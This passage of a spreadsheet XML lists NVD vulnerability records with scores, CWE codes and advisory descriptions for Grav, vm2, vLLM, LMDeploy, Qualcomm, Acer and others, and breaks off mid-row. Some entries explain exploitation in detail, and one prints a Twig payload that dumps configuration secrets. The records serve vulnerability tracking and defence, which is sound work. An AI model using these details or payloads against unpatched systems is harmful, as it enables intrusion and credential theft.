      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92916</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>Grav is a flat-file CMS. In Grav 1.7.0 through 1.7.53.2 and 2.0.0 through 2.0.21, when the debugger is enabled (system.debugger.enabled: true, which is not the default), the Clockwork profiler endpoint is exposed without authentication: InitializeProcessor::handleDebuggerRequest() intercepts any path containing /__clockwork/ during bootstrap and passes it to Debugger::debuggerRequest(), which performs no user lookup, IP restriction, or Clockwork authenticator check, and also supports anonymous pagination over the entire stored history. With the shipped censored: false default, each stored record contains raw request cookies (including Grav's session cookie, whose value is the PHP session id, allowing an attacker to resume another user's session, including an authenticated admin's), the full parsed request body (Grav's login form posts data[username]/data[password], so passwords are stored in plaintext because Clockwork's password filter only inspects top-level keys), and the site's entire system and plugin configuration, including operator-saved secrets such as SMTP credentials, third-party API keys, and licence keys. Authorization and X-API-Token headers are stored even when censored: true. On Grav 2.0, setting provider: debugbar does not avoid the issue because Grav forces the Clockwork provider for requests preferring a JSON response. The issue is fixed in 1.7.53.4 and 2.0.22, which restrict /__clockwork/ to server-local requests or requests presenting the new system.debugger.token secret and strip cookies and credential headers from stored records. Workarounds include setting debugger.enabled: false or blocking /__clockwork/ at the web server or CDN.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92916</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92917</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>Grav is a flat-file CMS. In versions 2.0.0-rc.1 through 2.0.21, the Twig content sandbox fails to restrict the dump and serialize filters (print_r, vardump, json_encode, yaml_encode, string): GravExtension::assertSandboxDumpSafe() determines sandbox state by calling SandboxExtension::isSandboxed() without a Source argument, which reports only the global sandbox flag that Grav never enables, so the guard added in GHSA-mc5q-6hpj-rp7j never executes. As a result, an authenticated user with page-edit rights can render {{ config|print_r }} in page content with Twig processing enabled and dump Grav's entire merged configuration — print_r reflects the real Config object held in a private property of the SandboxConfig facade, bypassing its path redaction — exposing plugin secrets such as SMTP credentials, API tokens, webhook secrets and cache backend passwords. Grav 1.7 is not affected because it ships no Twig content sandbox. The issue is fixed in 2.0.22, where the affected filters are registered with Twig's needs_is_sandboxed flag.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92917</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92942</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 (affected versions &lt;= 3.11.6) does not enforce the VM({ timeout }) option on code executed outside the synchronous VM#run() call. The timeout only wraps the single call to _runScript() via doWithTimeout() in lib/vm.js, and FinalizationRegistry and WeakRef are exposed to sandboxed code unmodified (they are not among the hardened globals in lib/setup-sandbox.js). Sandboxed code can register a FinalizationRegistry cleanup callback against an object and then drop the only strong reference to it; vm.run() returns within the configured timeout, but when the V8 garbage collector later reclaims the object it invokes the sandboxed cleanup callback outside any vm2 timeout accounting. A busy loop in that callback blocks the host event loop for an unbounded period, resulting in denial of service. The time of invocation depends on the garbage collector (e.g. under memory pressure or with --expose-gc).</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92942</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92961</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.6 fails to enforce bufferAllocLimit on ArrayBuffer, SharedArrayBuffer, and TypedArray constructors, allowing attackers to allocate arbitrary host memory. Attackers can bypass the buffer allocation cap by using these V8 intrinsics to exhaust host process memory and trigger out-of-memory conditions.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92961</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92983</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>InternLM LMDeploy through 0.17.0 in DistServe prefill/decode disaggregation mode fails to release scheduler sessions because the proxy uses user-facing session IDs instead of internal scheduler keys. Unauthenticated attackers can send completion requests to the proxy endpoint that accumulate unreleased scheduler metadata and memory until the prefill worker is out-of-memory killed.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92983</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93435</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>redis-parser through 3.0.0 contains a denial of service vulnerability in the RESP protocol parser that allows malicious Redis endpoints to crash the client process through unbounded recursion on nested arrays. Attackers can send crafted RESP byte streams with repeated array headers that exhaust the V8 call stack, causing an uncaught RangeError that terminates the Node.js process without triggering error handling callbacks.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93435</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93436</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>vLLM through 0.29.0 fails to properly clean up decode-side metadata for rejected inference requests in prefill/decode disaggregated deployments. Remote attackers can submit requests with max_tokens=0 to exhaust decode-worker memory without bound until the worker restarts.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93436</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24081</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing a channel map with insufficient used channels and adaptive frequency hopping is fully enabled.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24081</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25281</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing large or numerous request buffers without sufficient memory allocation validation.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25281</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25294</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Transient DOS while parsing frame during channel usage.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25294</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50605</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer Agent Service component included with NitroSense and PredatorSense. Insufficient access controls within a privileged service may allow an authenticated local user to perform unauthorized registry operations. In certain situations, this could lead to privilege escalation or compromise of the affected system.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50605</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50609</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. Insufficient access controls within a privileged Named Pipe service may allow an authenticated local user to perform unauthorized registry operations. In certain situations, this could lead to privilege escalation or compromise of the affected system.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50609</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50610</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense due to insufficient access controls in a privileged service. An authenticated local user may be able to access the service and perform unauthorized registry modifications, potentially resulting in local privilege escalation.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50610</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78501</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-923</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft 365 Copilot's Business Chat allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78501</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81446</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Server-Side Request Forgery (SSRF) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81446</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86688</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Session Fixation vulnerability in team-alembic ash_authentication allows an attacker who can plant a session identifier in a victim's browser to hold an authenticated session once that victim signs in.
